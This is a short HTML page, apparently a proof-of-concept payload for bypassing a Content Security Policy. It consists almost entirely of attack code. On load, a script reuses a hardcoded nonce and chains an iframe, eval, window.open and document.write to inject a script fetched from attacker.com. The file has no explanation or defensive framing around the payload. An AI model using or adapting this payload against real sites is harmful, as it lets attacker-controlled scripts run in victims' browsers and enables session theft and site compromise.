<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGvLFcdGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGvLFcdGGGGG.onload=_=>GGGGGvLFcdGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe srcdoc=\x22<script src=https://attacker.com/static/static.js nonce=123><\/script>\x22><\/iframe>');");GGGGGvLFcdGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>